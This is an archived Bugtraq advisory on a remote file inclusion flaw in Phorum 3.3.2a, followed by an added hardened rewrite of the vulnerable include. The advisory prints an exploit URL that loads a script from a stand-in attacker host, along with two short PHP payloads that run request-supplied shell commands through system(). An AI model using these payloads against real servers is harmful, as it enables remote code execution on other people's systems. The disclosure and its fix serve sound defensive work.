Bugtraq mailing list archives

Phorum 3.3.2a remote command execution


From: Markus Arndt <markus-arndt () web de>
Date: Fri, 17 May 2002 20:26:40 +0200

Target:
Phorum 3.3.2a (prior versions?)

Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitrary code.

Found by:
Markus Arndt <markus-arndt () web de>

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable to remote script inclusion:

./plugin/replace/plugin.php

Let's see some code:

        <?php
        // $PHORUM[settings_dir] is taken straight from the request when
        // register_globals is on, so the path of the included file is
        // attacker-controlled (this is the vulnerable line).
        include("$PHORUM[settings_dir]/replace.php");

        function mod_replace_read_body ($body) {
          global $pluginreplace;
          reset($pluginreplace);
          while(list($key,$val) = each($pluginreplace)) {
            $body = str_replace($key,$val,$body);
          }
          return $body;
        }

        $plugins["read_body"]["mod_replace"]="mod_replace_read_body";

        ?>

Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:

        <?
        echo("<?
        system(\"\$cmd\");
        ?>");
        ?>

If it's not php-enabled simply:
        <?
        system("$cmd");
        ?>

Markus Arndt <markus-arndt () web de>
http://skka.de
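For comparison, a hardened form of the include at the top of ./plugin/replace/plugin.php. This is an added example for this archive page, not Phorum's own fix: the settings directory is pinned by a constant the board defines before loading plugins (PHORUM_SETTINGS_DIR is a hypothetical name, as is the helper phorum_safe_settings_path), nothing from the request can influence it, and realpath() rejects URL wrappers and "../" escapes before include() is reached.

```php
<?php
// Hardened replacement for the include in ./plugin/replace/plugin.php.
// Added example, not Phorum's code. Assumes the board defines
// PHORUM_SETTINGS_DIR (hypothetical constant) from its own config file
// before plugins are loaded, so the request cannot set it.
//
// Belt and braces in php.ini, so the include can't reach out to a
// remote host even if a path check is missed somewhere else:
//   register_globals  = Off   (removed entirely in PHP 5.4+)
//   allow_url_fopen   = Off
//   allow_url_include = Off

// Constructed sample: the installer wrote this path into the config.
if (!defined('PHORUM_SETTINGS_DIR')) {
    define('PHORUM_SETTINGS_DIR', __DIR__ . '/../../settings');
}

/**
 * Return the canonical path of $file inside $base, or null if $file is
 * not a plain file name or does not resolve to a file under $base.
 */
function phorum_safe_settings_path(string $base, string $file): ?string
{
    // Only a simple "name.php" is acceptable; no slashes, no schemes.
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $file)) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // realpath() returns false for "http://..." and missing files and
    // collapses any "../", so the prefix test below catches escapes.
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $file);
    if ($candidate === false
        || strpos($candidate, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

$replaceFile = phorum_safe_settings_path(PHORUM_SETTINGS_DIR, 'replace.php');
if ($replaceFile === null) {
    // Fail closed: with no valid local settings file the plugin is a no-op.
    $pluginreplace = array();
} else {
    include $replaceFile;
}

function mod_replace_read_body($body)
{
    global $pluginreplace;
    foreach ($pluginreplace as $key => $val) {
        $body = str_replace($key, $val, $body);
    }
    return $body;
}

$plugins["read_body"]["mod_replace"] = "mod_replace_read_body";
?>
```

The check is deliberately two-layered: the regex stops the file name from carrying a scheme or directory component, and realpath() plus the prefix comparison stops a misconfigured or symlinked settings directory from pointing outside the install tree. With allow_url_fopen and allow_url_include off as well, a request like the one in the post above simply fails to load anything.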